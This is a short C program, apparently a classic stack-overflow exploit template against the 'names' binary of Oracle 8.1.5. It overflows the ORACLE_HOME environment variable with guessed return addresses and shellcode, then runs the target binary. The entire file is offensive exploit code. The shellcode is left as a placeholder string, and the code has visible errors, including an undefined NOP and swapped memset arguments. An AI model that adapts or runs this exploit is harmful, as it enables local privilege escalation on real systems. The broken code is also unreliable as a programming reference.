#include <stdio.h> 
#include <stdlib.h> 
#define BUFFER 800 
#define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names" 

char shellcode[] = "üblicher Shellcode";

unsigned long getesp(void) 
{ 
  __asm__("movl %esp,%eax"); 
} 

int main(int argc, char *argv[]) 
{
 char *buff, *ptr,binary[120]; 
 long *addr_ptr, addr; 
 int bsize=BUFFER; 
 int i,offset; 

 offset = 0 ; 

 if ( argc > 1 ) offset = atoi(argv[1]); 

 buff = malloc(bsize); 
 addr = getesp() - 5933 - offset; 
 ptr = buff; 
 addr_ptr = (long *) ptr; 

 for (i = 0; i < bsize; i+=4) 
  *(addr_ptr++) = addr; 
 memset(buff,bsize/2,NOP); 

 ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); 
 for (i = 0; i < strlen(shellcode); i++) 
  *(ptr++) = shellcode[i]; 
 buff[bsize - 1] = '\0'; 
 setenv("ORACLE_HOME",buff,1); 
 printf("[ offset:%d buffer=%d ret:0x%x ]\n", 
  offset,strlen(buff),addr); 
 system(PATH); 
}